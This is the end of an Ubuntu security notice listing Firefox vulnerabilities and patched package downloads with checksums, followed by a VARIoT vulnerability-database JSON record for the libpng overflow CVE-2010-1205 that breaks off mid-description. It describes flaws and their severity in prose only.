A flaw was discovered in the way plugin instances interacted. An attacker could potentially exploit this and use one plugin to access freed memory from a second plugin to execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-1198)
An integer overflow was discovered in Firefox. If a user were tricked into viewing a malicious site, an attacker could overflow a buffer and cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-1196)
Martin Barbella discovered an integer overflow in an XSLT node sorting routine. An attacker could exploit this to overflow a buffer and cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2010-1199)
Michal Zalewski discovered that the focus behavior of Firefox could be subverted. If a user were tricked into viewing a malicious site, a remote attacker could use this to capture keystrokes. (CVE-2010-1125)
Ilja van Sprundel discovered that the 'Content-Disposition: attachment' HTTP header was ignored when 'Content-Type: multipart' was also present. Under certain circumstances, this could potentially lead to cross-site scripting attacks. (CVE-2010-1197)
Amit Klein discovered that Firefox did not seed its random number generator often enough. An attacker could exploit this to identify and track users across different web sites. (CVE-2008-5913)
Updated packages for Ubuntu 9.04:
Source archives:
http://security.ubuntu.com/ubuntu/pool/
Size/MD5: 67119 0d7f276c870914e97be8016c470c0acc
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1.diff.gz
Size/MD5: 144826 b71440bbda1a9a19aa3434ad6a00c486
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1.dsc
Size/MD5: 2552 0e63965d7e1ba8d0c024793dae18a651
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly.orig.tar.gz
Size/MD5: 49883446 e3bdceebdf5bcc94f0f901ce8744a6df
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72226 e41f4ba0e1ee2812d09f178ce649be97
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/abrowser_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72392 fb339d706ee66252e70e96d62c33b305
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72228 d3b045b5cafba2c50b75eb3c5c0a590a
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72218 6a5c7d950490e1b8265bac1bc15abeb1
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72240 e1de71fa375ab4896e29dafcca783dba
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72574 f4cb1ee7572ed2ab316313ecbb3ed84f
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72236 2dece76f652e27494e7487f4e68f646a
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72222 c4aebcd1ce9c8b621b7297b7088d2ef4
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72256 3caf1296c3c06121157b6614170e1083
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72226 d1f70077a0e3ed2fee170c02bfb03e7c
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72212 133df734e76a4477af91dec984aa2694
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72240 6efcfef2ed5164204686ce075d23332d
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb
Size/MD5: 72210 07339b8304124d7afbacf53943f0500f
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/
Size/MD5: 7798876 759f27c1d6635a6d04b07c9a73f54f3c
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 72330 b9692de7b7947e32c1f678a9d554effa
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 72764 706e5682afbbc54334bb823fe92e9d0c
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb
Size/MD5: 12504700 0c81c0201b8a6b3aef72d2213d9d38b2
http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_amd64.deb
Size/MD5: 29308 4174c5e062a927f5f4fd445bc3f2b7ce
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/
Size/MD5: 9913748 ad706c2a0c670ea9bc6de7109211c8e4
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb
Size/MD5: 72340 b19f20096548fc8981367cd9d431379f
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb
Size/MD5: 72762 faaacee4aa7e2fd7fa961a88c4b86d0f
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb
Size/MD5: 11192572 5adae55773b0ca8e438c7252046f705b
http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_i386.deb
Size/MD5: 29308 ca6a787a65220583746b55366ae9ac44
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/
Size/MD5: 4830218 0d3caf5b20aba2975f9f7e423c6b3b69
http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 72332 099275f779e538dc54e913593084b7bc
http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 72762 ee7361261892014edfc1a69365672c17
http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_lpia.deb
Size/MD5: 10687418 2a010333c02ed1112cbef0544cf73cf1
http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_lpia.deb
Size/MD5: 29308 5fb3d21190e1e8012b08b694c4b9239c
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/
Size/MD5: 4812772 94b728d013dee6371b8cc4ebef11430c
http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 72340 6318359d26cfa32d4e1eeda6c8916aa4
http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 72770 e5449bcbe442fa1385d7b2ecbc8c1831
http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb
Size/MD5: 11583662 a73467d63e46af2f21b2e46fa0f29797
http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_powerpc.deb
Size/MD5: 29310 69a2c47902bb366a50c2bb3fa9053131
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/
Size/MD5: 75512 a49a96a5d589e39a77720fe70706da03
http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_sparc.deb
Size/MD5: 29312 e66a94b78d1d6476b05736a82c4ed49c
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/
Size/MD5: 2621 74297592edce6f55313193967daaebeb
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1.diff.gz
Size/MD5: 155727 0e58cb5f9e5293c40564e944e50437a6
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1.dsc
Size/MD5: 2758 e6647365f000313a96f9a72b4dc8022f
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly.orig.tar.gz
Size/MD5: 49883446 e3bdceebdf5bcc94f0f901ce8744a6df
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/
Size/MD5: 29714 b4ee604ee0d4dbdc448a74f6f746528c
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75716 8ec52b07f2b60dbb381909a6b7e5f039
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75964 69b4baf1c2b4ce75ced092dbdb44266b
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75700 22bd34473ba1abe7501b247f7d8980b5
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dbg_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75702 3dc765e62e9300dd5a57d512be2e3c3b
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75700 1ae9b7c023259e8f9fa994c24efeb07f
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75706 f4a1b34f657927ca5eaf15cf9976e336
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-dbg_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75704 80434fb6b98bd5ddafbd0d9d472b9416
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75698 1e6cffa413775771f086d3238ed84a6b
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75722 b3dea417d76e06235b1f7c267d4871fe
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 76052 9c59d599f01a4af2337515c224164b11
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75718 70e6d5d57e356e78500d8558e6ec7f72
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 8938 3085a96f8f815fbb01b21dd67d4b423d
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.1-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75710 45b7c94ece697097b83adb8bc09b5769
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.1_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 8940 8d60975aeb324b31426a64d0a1485320
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/abrowser-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 8930 e9c41de371986cf16137aa0a8baa1635
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75710 191d51d184569650814b7d1e87e808a3
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-dom-inspector_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75720 f18da780b4b8e57685667bb94faeac19
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75726 6bef8a651c1763ca5fdd3140bd7ae915
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-venkman_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75714 408c0fa73ac828fa9acae2a7ff02e6f7
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75692 3c4f3ef8332997b0a72bda0e436ab0fe
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1-branding_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75708 c3f238accf868508d1d44a3984a0deda
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75722 41bf0606552717a9988db2bd929b3862
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.1_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75692 e27ae8b4a4875eff55fedd2c3da9499e
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-dom-inspector_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb
Size/MD5: 75710 49ada82e615b86ac74f5880b656d8914
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/
Size/MD5: 10675764 276cf6fd80197d8edf64b2c885c5e540
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_amd64.deb
Size/MD5: 76196 ec574586607cd1da65dd5ee7c1f17317
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_amd64.deb
Size/MD5: 12502768 ef8749c8ba4b15a29631f69baccf6984
http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_amd64.deb
Size/MD5: 29196 766569469e7d1d805a16b659607cb228
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/
Size/MD5: 43286 e1e37c33ecc0918fcd518e5748c767e2
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_i386.deb
Size/MD5: 76198 06d415ebee45883afa9de06a4bf00ba2
http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_i386.deb
Size/MD5: 11217372 c3ddffd8a035d3be397ffc112c17e0a9
http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_i386.deb
Size/MD5: 29190 c59e1bbc03df75b63c72a956530ecdff
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/
Size/MD5: 4794796 0f04c58b1898ef6ff8c42e9f696cf943
http://ports.ubuntu.com/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_lpia.deb
Size/MD5: 76192 ac0e4a03520b896085dbc4b1e524c397
http://ports.ubuntu.com/pool/main/f/firefox-3.5/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_lpia.deb
Size/MD5: 10720482 e9459f2ddd0b28adc40e37bc46de87d8
http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_lpia.deb
Size/MD5: 29194 b5c356758ef5adb4468c85577660061a
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/
Size/MD5: 64642040 19a96c0ae2726790da3efb566ac4fdb0
http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_powerpc.deb
Size/MD5: 29200 69d071a75fcd766841f7f428ec9eb806
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/
Size/MD5: 7629538 5042de0cdebf36ad17e6485b966ec94f
http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_sparc.deb
Size/MD5: 29194 f154cda4e06288f639db4d6024c26695
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201006-1188",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.04"
},
{
"model": "seamonkey",
"scope": "lt",
"trust": 1.0,
"vendor": "mozilla",
"version": "2.0.6"
},
{
"model": "itunes",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.2"
},
{
"model": "mac os x server",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.0"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "9"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "12"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "6.06"
},
{
"model": "iphone os",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "4.1"
},
{
"model": "player",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "2.5"
},
{
"model": "workstation",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "6.5.0"
},
{
"model": "firefox",
"scope": "lt",
"trust": 1.0,
"vendor": "mozilla",
"version": "3.5.11"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.2"
},
{
"model": "player",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "2.5.5"
},
{
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.44"
},
{
"model": "thunderbird",
"scope": "lt",
"trust": 1.0,
"vendor": "mozilla",
"version": "3.1.1"
},
{
"model": "workstation",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "7.1"
},
{
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.0"
},
{
"model": "player",
"scope": "gte",
"trust": 1.0,
"vendor": "vmware",
"version": "3.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "5.0"
},
{
"model": "chrome",
"scope": "lt",
"trust": 1.0,
"vendor": "google",
"version": "5.0.375.99"
},
{
"model": "thunderbird",
"scope": "lt",
"trust": 1.0,
"vendor": "mozilla",
"version": "3.0.6"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "10.04"
},
{
"model": "player",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "3.1.2"
},
{
"model": "workstation",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "7.1.2"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "11"
},
{
"model": "safari",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "5.0.4"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.10"
},
{
"model": "firefox",
"scope": "lt",
"trust": 1.0,
"vendor": "mozilla",
"version": "3.6.7"
},
{
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.3"
},
{
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.4"
},
{
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.0"
},
{
"model": "workstation",
"scope": "lt",
"trust": 1.0,
"vendor": "vmware",
"version": "6.5.5"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "8.04"
},
{
"model": "iphone os",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "2.0"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "13"
},
{
"model": "firefox",
"scope": "gte",
"trust": 1.0,
"vendor": "mozilla",
"version": "3.5.12"
},
{
"model": "thunderbird",
"scope": "gte",
"trust": 1.0,
"vendor": "mozilla",
"version": "3.0.7"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "10"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.1"
},
{
"model": "mac os x server",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.4"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "libpng",
"version": null
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.2.22"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.47"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.4.0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#643615"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
},
{
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Greg Roelofs",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
}
],
"trust": 0.6
},
"cve": "CVE-2010-1205",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2010-1205",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-43810",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2010-1205",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2010-1205",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#643615",
"trust": 0.8,
"value": "12.96"
},
{
"author": "CNNVD",
"id": "CNNVD-201006-473",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-43810",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2010-1205",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#643615"
},
{
"db": "VULHUB",
"id": "VHN-43810"
},
{
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
},
{
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in pngpread.c in libpng before 1.2.44 and 1.4.x before 1.4.3, as used in progressive applications, might allow remote attackers to execute arbitrary code via a PNG image that triggers an additional data row. Libpng contains a vulnerability in the way it handles images containing an extra row of image data beyond the height reported in the image header. libpng is a PNG reference library that can create, read and write PNG graphics files. There is a buffer overflow vulnerability in the libpng library when processing graphics row data. If the graphics file provides an extra graphics row that is higher than the height reported in the header, this overflow can be triggered, resulting in arbitrary code execution; in addition, when processing a certain There may be a memory leak when some sCAL blocks are used, and specially crafted PNG graphics may cause a denial of service. ----------------------------------------------------------------------\n\n\n\"From 2007 to 2009 vulnerabilities in a typical end-user PC almost doubled from about 220 to 420.\"\n\nNon-Microsoft software to blame for increase in vulnerabilities affecting typical Windows end-users, read more:\n\nhttp://secunia.com/gfx/pdf/Secunia_Half_Year_Report_2010.pdf\n\n\n----------------------------------------------------------------------\n\nTITLE:\nMozilla Thunderbird Multiple Vulnerabilities\n\nSECUNIA ADVISORY 